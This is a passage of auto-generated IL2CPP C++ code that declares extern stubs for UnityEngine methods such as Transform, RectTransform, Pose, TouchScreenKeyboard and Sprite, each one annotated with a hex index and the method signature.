// 0x00000623 UnityEngine.TouchScreenKeyboard UnityEngine.TouchScreenKeyboard::Open(System.String,UnityEngine.TouchScreenKeyboardType,System.Boolean,System.Boolean,System.Boolean)
extern void TouchScreenKeyboard_Open_mD2914D3CB23CA8825EC0241F81D09F551DF90445 (void);
// 0x00000624 System.String UnityEngine.TouchScreenKeyboard::get_text()
extern void TouchScreenKeyboard_get_text_m74593E81B017446204A9DB1F7359922A2C005B1E (void);
// 0x00000625 System.Void UnityEngine.TouchScreenKeyboard::set_text(System.String)
extern void TouchScreenKeyboard_set_text_m0A8AA05F4D9D27E8764955F0041452145B6C6FBB (void);
// 0x00000626 System.Void UnityEngine.TouchScreenKeyboard::set_hideInput(System.Boolean)
extern void TouchScreenKeyboard_set_hideInput_m705D3D8A9B80346B7BDA63CF5C7F00D5249B8AEF (void);
// 0x00000627 System.Boolean UnityEngine.TouchScreenKeyboard::get_active()
extern void TouchScreenKeyboard_get_active_mB22402FB9E56D3F652DA785F01E504A530FF8775 (void);
// 0x00000628 System.Void UnityEngine.TouchScreenKeyboard::set_active(System.Boolean)
extern void TouchScreenKeyboard_set_active_m4382D57F87E4C86B59864E86BE93A8A2A474B7C2 (void);
// 0x00000629 UnityEngine.TouchScreenKeyboard/Status UnityEngine.TouchScreenKeyboard::get_status()
extern void TouchScreenKeyboard_get_status_mCC466FDEC7E1913D8585ABA7F048FC198CB19504 (void);
// 0x0000062A System.Void UnityEngine.TouchScreenKeyboard::set_characterLimit(System.Int32)
extern void TouchScreenKeyboard_set_characterLimit_mCD8F3BC047EF2515272A689368CF3678A419B854 (void);
// 0x0000062B System.Boolean UnityEngine.TouchScreenKeyboard::get_canGetSelection()
extern void TouchScreenKeyboard_get_canGetSelection_m340ACEFDB9609DEED4FE7D451A4DCCC1024F767A (void);
// 0x0000062C System.Boolean UnityEngine.TouchScreenKeyboard::get_canSetSelection()
extern void TouchScreenKeyboard_get_canSetSelection_m6CD6C069A9FEF91CC8014B877EB057ECF598EDF9 (void);
// 0x0000062D UnityEngine.RangeInt UnityEngine.TouchScreenKeyboard::get_selection()
extern void TouchScreenKeyboard_get_selection_m1D44C9A8D4EA91F61706F048ED318E537DC46AB2 (void);
// 0x0000062E System.Void UnityEngine.TouchScreenKeyboard::set_selection(UnityEngine.RangeInt)
extern void TouchScreenKeyboard_set_selection_mC27C2948118086822A151118C379FAAF692DB2DF (void);
// 0x0000062F System.Void UnityEngine.TouchScreenKeyboard::GetSelection(System.Int32&,System.Int32&)
extern void TouchScreenKeyboard_GetSelection_mF42EEF768DBF3EB86DC9A81E240DE0817D8BEBD1 (void);
// 0x00000630 System.Void UnityEngine.TouchScreenKeyboard::SetSelection(System.Int32,System.Int32)
extern void TouchScreenKeyboard_SetSelection_m3BF4C9BFCA4B489D9D74986C458B4D4EB02D63DD (void);
// 0x00000631 System.Void UnityEngine.Pose::.ctor(UnityEngine.Vector3,UnityEngine.Quaternion)
extern void Pose__ctor_m15CA45808A2BBF1956E836D22C387FAB80BED051 (void);
// 0x00000632 System.String UnityEngine.Pose::ToString()
extern void Pose_ToString_m4F33190911B86A9B72CA59D6AF3C633569CDE6D2 (void);
// 0x00000633 System.String UnityEngine.Pose::ToString(System.String)
extern void Pose_ToString_m8C3203B81EB15980F16E07C63B6FBBEECE50A6EF (void);
// 0x00000634 UnityEngine.Pose UnityEngine.Pose::GetTransformedBy(UnityEngine.Pose)
extern void Pose_GetTransformedBy_m8B18A1ED205791F95CDC1D1F2A08A42D6DA02CBF (void);
// 0x00000635 UnityEngine.Pose UnityEngine.Pose::GetTransformedBy(UnityEngine.Transform)
extern void Pose_GetTransformedBy_mB4C9FECEC5701B761A0E8CB2A8BC76D8E2FFDFCF (void);
// 0x00000636 UnityEngine.Vector3 UnityEngine.Pose::get_forward()
extern void Pose_get_forward_m510527153754B6C2B2CDFDEE25D7168E3C82372A (void);
// 0x00000637 UnityEngine.Vector3 UnityEngine.Pose::get_right()
extern void Pose_get_right_m8518E7BCEB74B9798BADB001B9E38756CC35ECFE (void);
// 0x00000638 UnityEngine.Vector3 UnityEngine.Pose::get_up()
extern void Pose_get_up_m5431E350242BEBB0CD7B0AAF9DC9468DC6DDFE5C (void);
// 0x00000639 UnityEngine.Pose UnityEngine.Pose::get_identity()
extern void Pose_get_identity_m523758317678304723B886B84FEFC973E9FE1BBE (void);
// 0x0000063A System.Boolean UnityEngine.Pose::Equals(System.Object)
extern void Pose_Equals_mE6D1524E4DDAAF86BF685A00FE9DCE0908A2A9D6 (void);
// 0x0000063B System.Boolean UnityEngine.Pose::Equals(UnityEngine.Pose)
extern void Pose_Equals_m31979E7A46252DBB620F4A0EA3BDBA61782DA498 (void);
// 0x0000063C System.Int32 UnityEngine.Pose::GetHashCode()
extern void Pose_GetHashCode_mDD6C48FABC18795F04F82D42DFCBC916C0C6CCDB (void);
// 0x0000063D System.Void UnityEngine.Pose::.cctor()
extern void Pose__cctor_mF12B7A4A66CB5AC677C7D652685DCC9FE1EE1715 (void);
// 0x0000063E System.Void UnityEngine.DrivenRectTransformTracker::Add(UnityEngine.Object,UnityEngine.RectTransform,UnityEngine.DrivenTransformProperties)
extern void DrivenRectTransformTracker_Add_mC0CE417831BF58E6DA81770CE5E2A99B142EEFEC (void);
// 0x0000063F System.Void UnityEngine.DrivenRectTransformTracker::Clear()
extern void DrivenRectTransformTracker_Clear_m9A7F5130E4007F70B14AB1FF13A2997C073A64EE (void);
// 0x00000640 System.Void UnityEngine.RectTransform::add_reapplyDrivenProperties(UnityEngine.RectTransform/ReapplyDrivenProperties)
extern void RectTransform_add_reapplyDrivenProperties_mE69B443497A08D0A958E304FE23AC455A43A7132 (void);
// 0x00000641 System.Void UnityEngine.RectTransform::remove_reapplyDrivenProperties(UnityEngine.RectTransform/ReapplyDrivenProperties)
extern void RectTransform_remove_reapplyDrivenProperties_mC4A73D2AA625A6108CEA35EDE218B42A7EB26D2E (void);
// 0x00000642 UnityEngine.Rect UnityEngine.RectTransform::get_rect()
extern void RectTransform_get_rect_mC82A60F8C3805ED9833508CCC233689641207488 (void);
// 0x00000643 UnityEngine.Vector2 UnityEngine.RectTransform::get_anchorMin()
extern void RectTransform_get_anchorMin_mD85363930BE38EC188F933B9F4D58320CAB72F03 (void);
// 0x00000644 System.Void UnityEngine.RectTransform::set_anchorMin(UnityEngine.Vector2)
extern void RectTransform_set_anchorMin_m931442ABE3368D6D4309F43DF1D64AB64B0F52E3 (void);
// 0x00000645 UnityEngine.Vector2 UnityEngine.RectTransform::get_anchorMax()
extern void RectTransform_get_anchorMax_mEF870BE2A134CEB9C2326930A71D3961271297DB (void);
// 0x00000646 System.Void UnityEngine.RectTransform::set_anchorMax(UnityEngine.Vector2)
extern void RectTransform_set_anchorMax_m52829ABEDD229ABD3DA20BCA676FA1DCA4A39B7D (void);
// 0x00000647 UnityEngine.Vector2 UnityEngine.RectTransform::get_anchoredPosition()
extern void RectTransform_get_anchoredPosition_m38F25A4253B0905BB058BE73DBF43C7172CE0680 (void);
// 0x00000648 System.Void UnityEngine.RectTransform::set_anchoredPosition(UnityEngine.Vector2)
extern void RectTransform_set_anchoredPosition_mF903ACE04F6959B1CD67E2B94FABC0263068F965 (void);
// 0x00000649 UnityEngine.Vector2 UnityEngine.RectTransform::get_sizeDelta()
extern void RectTransform_get_sizeDelta_m822A8493F2035677384F1540A2E9E5ACE63010BB (void);
// 0x0000064A System.Void UnityEngine.RectTransform::set_sizeDelta(UnityEngine.Vector2)
extern void RectTransform_set_sizeDelta_mC9A980EA6036E6725EF24CEDF3EE80A9B2B50EE5 (void);
// 0x0000064B UnityEngine.Vector2 UnityEngine.RectTransform::get_pivot()
extern void RectTransform_get_pivot_mA8334AF05AA7FF09A173A2430F2BB9E85E5CBFFF (void);
// 0x0000064C System.Void UnityEngine.RectTransform::set_pivot(UnityEngine.Vector2)
extern void RectTransform_set_pivot_m79D0177D383D432A93C2615F1932B739B1C6E146 (void);
// 0x0000064D UnityEngine.Vector3 UnityEngine.RectTransform::get_anchoredPosition3D()
extern void RectTransform_get_anchoredPosition3D_mE2E0547DCA8921F42B5C666E562E6A59B4894CDA (void);
// 0x0000064E System.Void UnityEngine.RectTransform::set_anchoredPosition3D(UnityEngine.Vector3)
extern void RectTransform_set_anchoredPosition3D_m214FBDBA019743FAED8FA03857475073AA0539C4 (void);
// 0x0000064F UnityEngine.Vector2 UnityEngine.RectTransform::get_offsetMin()
extern void RectTransform_get_offsetMin_mD02BE5256DADAF02CEEF99214C4E80478CD5287B (void);
// 0x00000650 System.Void UnityEngine.RectTransform::set_offsetMin(UnityEngine.Vector2)
extern void RectTransform_set_offsetMin_m07F38B4105C7CA9CC9FBDC9ED0DB008602880AB9 (void);
// 0x00000651 UnityEngine.Vector2 UnityEngine.RectTransform::get_offsetMax()
extern void RectTransform_get_offsetMax_m6A51C62A2C69780EFD879D3CFE4EE2CBF4AD3D73 (void);
// 0x00000652 System.Void UnityEngine.RectTransform::set_offsetMax(UnityEngine.Vector2)
extern void RectTransform_set_offsetMax_m5514D09D86516F2C0E25FA6D11A3A4274D3D002D (void);
// 0x00000653 System.Void UnityEngine.RectTransform::ForceUpdateRectTransforms()
extern void RectTransform_ForceUpdateRectTransforms_m031DD32EFE51B667D300E19009EFD5A7CA9119D1 (void);
// 0x00000654 System.Void UnityEngine.RectTransform::GetLocalCorners(UnityEngine.Vector3[])
extern void RectTransform_GetLocalCorners_m18B3E5ED5EB24AD46279199A134CD7F218D3DD11 (void);
// 0x00000655 System.Void UnityEngine.RectTransform::GetWorldCorners(UnityEngine.Vector3[])
extern void RectTransform_GetWorldCorners_m6E15303C3B065B2F65E0A7F0E0217695564C2E09 (void);
// 0x00000656 System.Void UnityEngine.RectTransform::SetSizeWithCurrentAnchors(UnityEngine.RectTransform/Axis,System.Single)
extern void RectTransform_SetSizeWithCurrentAnchors_m53A04549B7687A1DEA2C7484E56D89809390CE44 (void);
// 0x00000657 System.Void UnityEngine.RectTransform::SendReapplyDrivenProperties(UnityEngine.RectTransform)
extern void RectTransform_SendReapplyDrivenProperties_m4CB0E4A4F2E19CF40B008D9F25A477D18B2D22BE (void);
// 0x00000658 UnityEngine.Vector2 UnityEngine.RectTransform::GetParentSize()
extern void RectTransform_GetParentSize_m462044ABB7282640CCC3929A7BC3FC5609C30C42 (void);
// 0x00000659 System.Void UnityEngine.RectTransform::get_rect_Injected(UnityEngine.Rect&)
extern void RectTransform_get_rect_Injected_m2CAD7BD1A157125337831D705F8953CB43EFCA22 (void);
// 0x0000065A System.Void UnityEngine.RectTransform::get_anchorMin_Injected(UnityEngine.Vector2&)
extern void RectTransform_get_anchorMin_Injected_mA00B0680244E546BE0C7F715CD27BF15708F33F0 (void);
// 0x0000065B System.Void UnityEngine.RectTransform::set_anchorMin_Injected(UnityEngine.Vector2&)
extern void RectTransform_set_anchorMin_Injected_m062070AA530E9DB918780A05DA5D1A7813594696 (void);
// 0x0000065C System.Void UnityEngine.RectTransform::get_anchorMax_Injected(UnityEngine.Vector2&)
extern void RectTransform_get_anchorMax_Injected_m33D2FB73C038385395F18D4B75C090476D08F5E0 (void);
// 0x0000065D System.Void UnityEngine.RectTransform::set_anchorMax_Injected(UnityEngine.Vector2&)
extern void RectTransform_set_anchorMax_Injected_mFD5947257451DAF1230D993A794DA690915443A5 (void);
// 0x0000065E System.Void UnityEngine.RectTransform::get_anchoredPosition_Injected(UnityEngine.Vector2&)
extern void RectTransform_get_anchoredPosition_Injected_m101611A28C40B0E8ABE9983AE9ADC26940A2F9D7 (void);
// 0x0000065F System.Void UnityEngine.RectTransform::set_anchoredPosition_Injected(UnityEngine.Vector2&)
extern void RectTransform_set_anchoredPosition_Injected_m9B719BB4C1D0E4EDE750CB93E19251DA94573F8A (void);
// 0x00000660 System.Void UnityEngine.RectTransform::get_sizeDelta_Injected(UnityEngine.Vector2&)
extern void RectTransform_get_sizeDelta_Injected_mB107881782C0DFF99C0EC61A4D423FB3C91D5405 (void);
// 0x00000661 System.Void UnityEngine.RectTransform::set_sizeDelta_Injected(UnityEngine.Vector2&)
extern void RectTransform_set_sizeDelta_Injected_m3690D9F545C7C324591F81934046370DF7F1702E (void);
// 0x00000662 System.Void UnityEngine.RectTransform::get_pivot_Injected(UnityEngine.Vector2&)
extern void RectTransform_get_pivot_Injected_m1D193D87AE52D7BCF41990B13ADF1A807928289F (void);
// 0x00000663 System.Void UnityEngine.RectTransform::set_pivot_Injected(UnityEngine.Vector2&)
extern void RectTransform_set_pivot_Injected_m9693DF374A51072B4804362B6E7E065BD4A5B48C (void);
// 0x00000664 System.Void UnityEngine.RectTransform/ReapplyDrivenProperties::.ctor(System.Object,System.IntPtr)
extern void ReapplyDrivenProperties__ctor_mC06AEE119C82C068873EE368C7C8DBE9CAD28949 (void);
// 0x00000665 System.Void UnityEngine.RectTransform/ReapplyDrivenProperties::Invoke(UnityEngine.RectTransform)
extern void ReapplyDrivenProperties_Invoke_m3440A5F41B8B52D671A1C26356CB20CF8E7AC39A (void);
// 0x00000666 System.Void UnityEngine.Transform::.ctor()
extern void Transform__ctor_mB597BB13F66ADC3B8A3D45A2ABDEC8C02B421B93 (void);
// 0x00000667 UnityEngine.Vector3 UnityEngine.Transform::get_position()
extern void Transform_get_position_m69CD5FA214FDAE7BB701552943674846C220FDE1 (void);
// 0x00000668 System.Void UnityEngine.Transform::set_position(UnityEngine.Vector3)
extern void Transform_set_position_mA1A817124BB41B685043DED2A9BA48CDF37C4156 (void);
// 0x00000669 UnityEngine.Vector3 UnityEngine.Transform::get_localPosition()
extern void Transform_get_localPosition_mA9C86B990DF0685EA1061A120218993FDCC60A95 (void);
// 0x0000066A System.Void UnityEngine.Transform::set_localPosition(UnityEngine.Vector3)
extern void Transform_set_localPosition_mDE1C997F7D79C0885210B7732B4BA50EE7D73134 (void);
// 0x0000066B UnityEngine.Vector3 UnityEngine.Transform::get_eulerAngles()
extern void Transform_get_eulerAngles_mCAAF48EFCF628F1ED91C2FFE75A4FD19C039DD6A (void);
// 0x0000066C System.Void UnityEngine.Transform::set_eulerAngles(UnityEngine.Vector3)
extern void Transform_set_eulerAngles_m9F0BC484A7915A51FAB87230644229B75BACA004 (void);
// 0x0000066D UnityEngine.Vector3 UnityEngine.Transform::get_localEulerAngles()
extern void Transform_get_localEulerAngles_m358AA9AE8FA24FD1BB7842D231C8644D1C2910C6 (void);
// 0x0000066E System.Void UnityEngine.Transform::set_localEulerAngles(UnityEngine.Vector3)
extern void Transform_set_localEulerAngles_m0458551662A1A51FDCA4C0417282B25D391661DF (void);
// 0x0000066F UnityEngine.Vector3 UnityEngine.Transform::get_up()
extern void Transform_get_up_mE47A9D9D96422224DD0539AA5524DA5440145BB2 (void);
// 0x00000670 UnityEngine.Vector3 UnityEngine.Transform::get_forward()
extern void Transform_get_forward_mFCFACF7165FDAB21E80E384C494DF278386CEE2F (void);
// 0x00000671 UnityEngine.Quaternion UnityEngine.Transform::get_rotation()
extern void Transform_get_rotation_m32AF40CA0D50C797DA639A696F8EAEC7524C179C (void);
// 0x00000672 System.Void UnityEngine.Transform::set_rotation(UnityEngine.Quaternion)
extern void Transform_set_rotation_m61340DE74726CF0F9946743A727C4D444397331D (void);
// 0x00000673 UnityEngine.Quaternion UnityEngine.Transform::get_localRotation()
extern void Transform_get_localRotation_mD53D37611A5DAE93EC6C7BBCAC337408C5CACA77 (void);
// 0x00000674 System.Void UnityEngine.Transform::set_localRotation(UnityEngine.Quaternion)
extern void Transform_set_localRotation_mAB4A011D134BA58AB780BECC0025CA65F16185FA (void);
// 0x00000675 UnityEngine.Vector3 UnityEngine.Transform::get_localScale()
extern void Transform_get_localScale_m804A002A53A645CDFCD15BB0F37209162720363F (void);
// 0x00000676 System.Void UnityEngine.Transform::set_localScale(UnityEngine.Vector3)
extern void Transform_set_localScale_mBA79E811BAF6C47B80FF76414C12B47B3CD03633 (void);
// 0x00000677 UnityEngine.Transform UnityEngine.Transform::get_parent()
extern void Transform_get_parent_m65354E28A4C94EC00EBCF03532F7B0718380791E (void);
// 0x00000678 System.Void UnityEngine.Transform::set_parent(UnityEngine.Transform)
extern void Transform_set_parent_m9BD5E563B539DD5BEC342736B03F97B38A243234 (void);
// 0x00000679 UnityEngine.Transform UnityEngine.Transform::get_parentInternal()
extern void Transform_get_parentInternal_mADE30238BECA9CDE15FB84E208FB5C6FDC31C14E (void);
// 0x0000067A System.Void UnityEngine.Transform::set_parentInternal(UnityEngine.Transform)
extern void Transform_set_parentInternal_m7AC9FA19DF51534D5E83CB8B495CDC11BA17E979 (void);
// 0x0000067B UnityEngine.Transform UnityEngine.Transform::GetParent()
extern void Transform_GetParent_m0DDE14F6AA36850AAEB05B13AB8B18CB02BA875B (void);
// 0x0000067C System.Void UnityEngine.Transform::SetParent(UnityEngine.Transform)
extern void Transform_SetParent_m6677538B60246D958DD91F931C50F969CCBB5250 (void);
// 0x0000067D System.Void UnityEngine.Transform::SetParent(UnityEngine.Transform,System.Boolean)
extern void Transform_SetParent_m9BDD7B7476714B2D7919B10BDC22CE75C0A0A195 (void);
// 0x0000067E UnityEngine.Matrix4x4 UnityEngine.Transform::get_worldToLocalMatrix()
extern void Transform_get_worldToLocalMatrix_mB633C122A01BCE8E51B10B8B8CB95F580750B3F1 (void);
// 0x0000067F UnityEngine.Matrix4x4 UnityEngine.Transform::get_localToWorldMatrix()
extern void Transform_get_localToWorldMatrix_m5D35188766856338DD21DE756F42277C21719E6D (void);
// 0x00000680 System.Void UnityEngine.Transform::SetPositionAndRotation(UnityEngine.Vector3,UnityEngine.Quaternion)
extern void Transform_SetPositionAndRotation_m418859BF59086EEAA084FFD6F258A43FAB408F5A (void);
// 0x00000681 System.Void UnityEngine.Transform::RotateAroundInternal(UnityEngine.Vector3,System.Single)
extern void Transform_RotateAroundInternal_m320F8F4AE36A0D2E45953044466F2C213F1791D5 (void);
// 0x00000682 System.Void UnityEngine.Transform::Rotate(UnityEngine.Vector3,System.Single,UnityEngine.Space)
extern void Transform_Rotate_m683E67853797040312868B69E963D0E97F433EEB (void);
// 0x00000683 System.Void UnityEngine.Transform::RotateAround(UnityEngine.Vector3,UnityEngine.Vector3,System.Single)
extern void Transform_RotateAround_m489C5BE8B8B15D0A5F4863DE6D23FF2CC8FA76C6 (void);
// 0x00000684 System.Void UnityEngine.Transform::LookAt(UnityEngine.Vector3,UnityEngine.Vector3)
extern void Transform_LookAt_mBD38EDB5E915C5DA6C5A79D191DEE2C826A9FC2C (void);
// 0x00000685 System.Void UnityEngine.Transform::Internal_LookAt(UnityEngine.Vector3,UnityEngine.Vector3)
extern void Transform_Internal_LookAt_m336FFC351DF1537B11EE28EB7B6161880949F3DD (void);
// 0x00000686 UnityEngine.Vector3 UnityEngine.Transform::TransformDirection(UnityEngine.Vector3)
extern void Transform_TransformDirection_m9BE1261DF2D48B7A4A27D31EE24D2D97F89E7757 (void);
// 0x00000687 UnityEngine.Vector3 UnityEngine.Transform::InverseTransformDirection(UnityEngine.Vector3)
extern void Transform_InverseTransformDirection_m69C077B881A98B08C7F231EFC49429C906FBC575 (void);
// 0x00000688 UnityEngine.Vector3 UnityEngine.Transform::TransformPoint(UnityEngine.Vector3)
extern void Transform_TransformPoint_m05BFF013DB830D7BFE44A007703694AE1062EE44 (void);
// 0x00000689 UnityEngine.Vector3 UnityEngine.Transform::InverseTransformPoint(UnityEngine.Vector3)
extern void Transform_InverseTransformPoint_m18CD395144D9C78F30E15A5B82B6670E792DBA5D (void);
// 0x0000068A System.Int32 UnityEngine.Transform::get_childCount()
extern void Transform_get_childCount_mE9C29C702AB662CC540CA053EDE48BDAFA35B4B0 (void);
// 0x0000068B System.Void UnityEngine.Transform::SetAsFirstSibling()
extern void Transform_SetAsFirstSibling_mBE0D0E76099F829466DC2FBD71ACFCF3C8EC03BD (void);
// 0x0000068C UnityEngine.Transform UnityEngine.Transform::FindRelativeTransformWithPath(UnityEngine.Transform,System.String,System.Boolean)
extern void Transform_FindRelativeTransformWithPath_m8A3198609EE1F59E22D2835D9B37F5BB7837EC7D (void);
// 0x0000068D UnityEngine.Transform UnityEngine.Transform::Find(System.String)
extern void Transform_Find_m3087032B0E1C5B96A2D2C27020BAEAE2DA08F932 (void);
// 0x0000068E UnityEngine.Vector3 UnityEngine.Transform::get_lossyScale()
extern void Transform_get_lossyScale_mFF740DA4BE1489C6882CD2F3A37B7321176E5D07 (void);
// 0x0000068F System.Boolean UnityEngine.Transform::IsChildOf(UnityEngine.Transform)
extern void Transform_IsChildOf_mFE071BE1E775E825401FE0A9B9BE49E39D256CEA (void);
// 0x00000690 System.Boolean UnityEngine.Transform::get_hasChanged()
extern void Transform_get_hasChanged_m570B3328E80AA338FF074A5C208500E98E440795 (void);
// 0x00000691 System.Void UnityEngine.Transform::set_hasChanged(System.Boolean)
extern void Transform_set_hasChanged_mCE980898F6D52F81E7E6B772DCA89E13A15870AE (void);
// 0x00000692 System.Collections.IEnumerator UnityEngine.Transform::GetEnumerator()
extern void Transform_GetEnumerator_mA7E1C882ACA0C33E284711CD09971DEA3FFEF404 (void);
// 0x00000693 UnityEngine.Transform UnityEngine.Transform::GetChild(System.Int32)
extern void Transform_GetChild_mE686DF0C7AAC1F7AEF356967B1C04D8B8E240EAF (void);
// 0x00000694 System.Void UnityEngine.Transform::get_position_Injected(UnityEngine.Vector3&)
extern void Transform_get_position_Injected_mC69C78EAC69F2912B161B5710E69F7D3DC30C815 (void);
// 0x00000695 System.Void UnityEngine.Transform::set_position_Injected(UnityEngine.Vector3&)
extern void Transform_set_position_Injected_mD8E9699EA5FEBA7817BBBCB72F62BFDD26C14E33 (void);
// 0x00000696 System.Void UnityEngine.Transform::get_localPosition_Injected(UnityEngine.Vector3&)
extern void Transform_get_localPosition_Injected_m4EA29DEBBB27D41E17E6F7469217B50B7594DF22 (void);
// 0x00000697 System.Void UnityEngine.Transform::set_localPosition_Injected(UnityEngine.Vector3&)
extern void Transform_set_localPosition_Injected_mB0AC6C9E6298454212FD390CB010ED9F5B0B075A (void);
// 0x00000698 System.Void UnityEngine.Transform::get_rotation_Injected(UnityEngine.Quaternion&)
extern void Transform_get_rotation_Injected_m6532D51417F17B804F56FC809B833F3BE524F0FC (void);
// 0x00000699 System.Void UnityEngine.Transform::set_rotation_Injected(UnityEngine.Quaternion&)
extern void Transform_set_rotation_Injected_m0CC3E1F4A5E72DC8B5496E9248064C91BE70C20C (void);
// 0x0000069A System.Void UnityEngine.Transform::get_localRotation_Injected(UnityEngine.Quaternion&)
extern void Transform_get_localRotation_Injected_m1597F48A85A1F4FFDC4597B66906CC45A0F3A1A1 (void);
// 0x0000069B System.Void UnityEngine.Transform::set_localRotation_Injected(UnityEngine.Quaternion&)
extern void Transform_set_localRotation_Injected_m7F19BC3A69E968FF240368F65E095082A9253B53 (void);
// 0x0000069C System.Void UnityEngine.Transform::get_localScale_Injected(UnityEngine.Vector3&)
extern void Transform_get_localScale_Injected_m39985DA5D17EF46D4E8858AA98AF498BCC8A99D9 (void);
// 0x0000069D System.Void UnityEngine.Transform::set_localScale_Injected(UnityEngine.Vector3&)
extern void Transform_set_localScale_Injected_m4ECD0F3FCC76D0B0FE5CE13E8B4BBB06489C44F2 (void);
// 0x0000069E System.Void UnityEngine.Transform::get_worldToLocalMatrix_Injected(UnityEngine.Matrix4x4&)
extern void Transform_get_worldToLocalMatrix_Injected_mDBC9452FF28DF93AA1F7DF84AF1526F08E160963 (void);
// 0x0000069F System.Void UnityEngine.Transform::get_localToWorldMatrix_Injected(UnityEngine.Matrix4x4&)
extern void Transform_get_localToWorldMatrix_Injected_m17F83E29C6BC4F3C9891D9F7FF6F2059E09BB21D (void);
// 0x000006A0 System.Void UnityEngine.Transform::SetPositionAndRotation_Injected(UnityEngine.Vector3&,UnityEngine.Quaternion&)
extern void Transform_SetPositionAndRotation_Injected_m1378C65BD26A5C2C235CBDC7F36988E30485ECC3 (void);
// 0x000006A1 System.Void UnityEngine.Transform::RotateAroundInternal_Injected(UnityEngine.Vector3&,System.Single)
extern void Transform_RotateAroundInternal_Injected_m7A30E4B3DE1D76B35288EEB6625EFAE5433970B6 (void);
// 0x000006A2 System.Void UnityEngine.Transform::Internal_LookAt_Injected(UnityEngine.Vector3&,UnityEngine.Vector3&)
extern void Transform_Internal_LookAt_Injected_m4B931A0A76B0F7E214E223B6DDBAAE0D0D7375E9 (void);
// 0x000006A3 System.Void UnityEngine.Transform::TransformDirection_Injected(UnityEngine.Vector3&,UnityEngine.Vector3&)
extern void Transform_TransformDirection_Injected_m3AC04BE74AF474A446E6AD65B1C086E30373A214 (void);
// 0x000006A4 System.Void UnityEngine.Transform::InverseTransformDirection_Injected(UnityEngine.Vector3&,UnityEngine.Vector3&)
extern void Transform_InverseTransformDirection_Injected_m153CC319086000795C1B0A2B5D52CF04D43DCDDE (void);
// 0x000006A5 System.Void UnityEngine.Transform::TransformPoint_Injected(UnityEngine.Vector3&,UnityEngine.Vector3&)
extern void Transform_TransformPoint_Injected_mC39341E3D842D1AEAF3DE2496BD9CCDE6087D65E (void);
// 0x000006A6 System.Void UnityEngine.Transform::InverseTransformPoint_Injected(UnityEngine.Vector3&,UnityEngine.Vector3&)
extern void Transform_InverseTransformPoint_Injected_m6F7266D1FD453F86081B7286C0848DF8F32593A6 (void);
// 0x000006A7 System.Void UnityEngine.Transform::get_lossyScale_Injected(UnityEngine.Vector3&)
extern void Transform_get_lossyScale_Injected_mDCE0BE28BAC6A6A89056535B481A6F84C36E8F68 (void);
// 0x000006A8 System.Void UnityEngine.Transform/Enumerator::.ctor(UnityEngine.Transform)
extern void Enumerator__ctor_m83A956CC6A8C1F2318C7660553BAD2D2B25AD71A (void);
// 0x000006A9 System.Object UnityEngine.Transform/Enumerator::get_Current()
extern void Enumerator_get_Current_m4732420B5A80C615B7CA373E750542E7F91D93DF (void);
// 0x000006AA System.Boolean UnityEngine.Transform/Enumerator::MoveNext()
extern void Enumerator_MoveNext_mCC9D1D19DCDF3F54E1FFC2798D073C01C202D984 (void);
// 0x000006AB System.Void UnityEngine.Transform/Enumerator::Reset()
extern void Enumerator_Reset_m91311F4F60075A13C6B8A27BC2856B37DC18A63E (void);
// 0x000006AC System.Void UnityEngine.SpriteRenderer::InvokeSpriteChanged()
extern void SpriteRenderer_InvokeSpriteChanged_m105236F9C9637A421F96627823413A679319AFB8 (void);
// 0x000006AD System.Void UnityEngine.SpriteRenderer::set_sprite(UnityEngine.Sprite)
extern void SpriteRenderer_set_sprite_m7B176E33955108C60CAE21DFC153A0FAC674CB53 (void);
// 0x000006AE UnityEngine.Color UnityEngine.SpriteRenderer::get_color()
extern void SpriteRenderer_get_color_mF19DA1B83ABD9A825127D4FBED9A111FE52F1F52 (void);
// 0x000006AF System.Void UnityEngine.SpriteRenderer::set_color(UnityEngine.Color)
extern void SpriteRenderer_set_color_mB0EEC2845A0347E296C01C831F967731D2804546 (void);
// 0x000006B0 System.Void UnityEngine.SpriteRenderer::get_color_Injected(UnityEngine.Color&)
extern void SpriteRenderer_get_color_Injected_m03948A0B439D830625AE56E44F3532E5BDB8C766 (void);
// 0x000006B1 System.Void UnityEngine.SpriteRenderer::set_color_Injected(UnityEngine.Color&)
extern void SpriteRenderer_set_color_Injected_m57BA74C4EA48105B360D2DA91158D5235E9B4CE9 (void);
// 0x000006B2 System.Void UnityEngine.Sprite::.ctor()
extern void Sprite__ctor_m14DB77A0955914B9B8D8189BB1A6B190B3CCF919 (void);
// 0x000006B3 System.Int32 UnityEngine.Sprite::GetPackingMode()
extern void Sprite_GetPackingMode_m281821E0A6129D699F445A0CCFE7FE0C3DBFE0E8 (void);
// 0x000006B4 System.Int32 UnityEngine.Sprite::GetPackingRotation()
extern void Sprite_GetPackingRotation_mE9EBA99C7A1F3BCED26BCFB086C136CC1A4358E9 (void);
// 0x000006B5 System.Int32 UnityEngine.Sprite::GetPacked()
extern void Sprite_GetPacked_m020A62AD57E08E1E3AF4F9FF20A77A7E80052684 (void);
// 0x000006B6 UnityEngine.Rect UnityEngine.Sprite::GetTextureRect()
extern void Sprite_GetTextureRect_m8E30C1D33B201FBDFF99C0DCEA634BD6AFC551B0 (void);
// 0x000006B7 UnityEngine.Vector4 UnityEngine.Sprite::GetInnerUVs()
extern void Sprite_GetInnerUVs_m68A07E15B8D8F07E33559998000B524B54E1951A (void);
// 0x000006B8 UnityEngine.Vector4 UnityEngine.Sprite::GetOuterUVs()
extern void Sprite_GetOuterUVs_m0239F5571EA1AE399B426DE9362EEAC73A3ECC42 (void);
// 0x000006B9 UnityEngine.Vector4 UnityEngine.Sprite::GetPadding()
extern void Sprite_GetPadding_mF346EAFF67C810A108E64366EB5CB3CB2E01D066 (void);
// 0x000006BA UnityEngine.Sprite UnityEngine.Sprite::CreateSprite(UnityEngine.Texture2D,UnityEngine.Rect,UnityEngine.Vector2,System.Single,System.UInt32,UnityEngine.SpriteMeshType,UnityEngine.Vector4,System.Boolean)
extern void Sprite_CreateSprite_mF097AD2D5CC23805EFE71A9929CF2562C74E0DB3 (void);
// 0x000006BB UnityEngine.Bounds UnityEngine.Sprite::get_bounds()
extern void Sprite_get_bounds_m042F847F6C5118E6B14A3F79A1E1C53E7DFBF452 (void);
// 0x000006BC UnityEngine.Rect UnityEngine.Sprite::get_rect()
extern void Sprite_get_rect_m2D85032EBEDC505E346E49291B8816BDB18DF625 (void);
// 0x000006BD UnityEngine.Vector4 UnityEngine.Sprite::get_border()
extern void Sprite_get_border_m024C8361A808BF597EC6E1849AADDA9C756B459F (void);
// 0x000006BE UnityEngine.Texture2D UnityEngine.Sprite::get_texture()
extern void Sprite_get_texture_mEEA6640C1B5D38F84CB64C775B201D7D9F48E045 (void);
